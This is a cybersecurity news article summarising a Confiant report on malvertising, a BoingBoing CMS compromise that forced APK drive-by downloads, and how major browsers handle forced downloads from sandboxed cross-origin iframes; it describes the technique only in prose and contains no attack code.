Home > Cyber News > The State of Malvertising and Drive-By Downloads
CYBER NEWS

The State of Malvertising and Drive-By Downloads

A new Confiant report explores “the details behind a recent spree of website hacks” as well as the malicious payloads delivered to victims. The report also includes details on drive-by downloads, their current state in major browsers, and how they will be addressed in the future.

There’s more to malvertising than meets the eye

The researchers also look into malvertising campaigns, thus aiming to provide “a much broader landscape beyond what merely happens in the ad slot“. In other words, there’s more to malvertising than malicious ads. Media buys may be a preferred option for an entry point, but they are not the only option available.

What is the current state of malvertising and drive-by downloads?

In a typical malvertising chain, there are multiple handoffs, similar to a traditional ad tech driven CPA campaign. With malware, it just so happens that the latter stages of the hand off happen among sketchy middlemen that take pull the victim to a malicious landing page, Confiant explains.

The researchers closely inspected a malicious incident that happened to the Android app version of BoingBoing in January 2020, when malicious overlays were detected on the website. Initially believed to be a “bad ad” incident, the same attack was later detected on other websites as well:

Over the following weeks, we detected this attack on a multitude of sites. Usually this manifests through a CMS compromise that introduces this malicious payload.

In other words, it turned out that the supposed malvertising campaign is not related to malvertisinf. In fact, BoingBoing’s CMS was hacked, and a script was injected that displayed the malicious overlays to visitors.

After some further investigation, the researchers discovered that the drive-by-downloads were being initiated by JavaScript embedded into the page. This script would create a link on the page and click a link, without the need of user interaction, thus initiating the download.

A question then appeared: even though the BoingBoing attack wasn’t malvertising, could a similar scenario happen via malvertising and sandboxed iframes?

Most ads rely on sandboxed iframes to embed an ad on a web page. Since ads are typically controlled by third-parties, the iframes are usually utilized with sandboxing to improve security and restrict actions on the side of third-parties.

How are browsers doing?

To check whether the malicious script would lead to a drive-by-download of an APK in sandboxed cross-origin iframes, the researchers created a proof-of-concept page with the idea to test several browsers.

The inspiration for doing this analysis was the shocking discovery that most browsers will honor forced downloads from cross-origin frames. In fact, forced downloads like this are still often possible in Sandboxed Cross-Origin iframes, having only been addressed in Chrome for this last release of Chrome 83, the report explained.

However, things are not as good with Mozilla Firefox, as this browser doesn’t prevent downloads in cross-origin iframes, which leads to the user being prompted to download the file. A similar picture was seen in the Brave browser. As for Safari, for some reason the browser “wants to honor the download, but seems to just get stuck” without even finishing it.

Mobile browsers displayed inconsistent behavior:

For example, Android browsers are quick to warn you when the download is a file with an APK extension, but anything else often doesn’t even get a prompt.

As pointed out in the report, it is quite surprising that today we can still force downloaded not initiated by the user, without any prompt from cross-origin iframes in most major browsers. The question why still stands unanswered.


Few years ago, a large malvertising campaign which has been taking over entire ad servers to insert malicious ads into their ad inventories was discovered by Confiant. The malicious ads would redirect unsuspecting users to sites ridden with malware typically masqueraded as Adobe Flash Player updates. The campaign had been going on for at least nine months.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:
Twitter

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree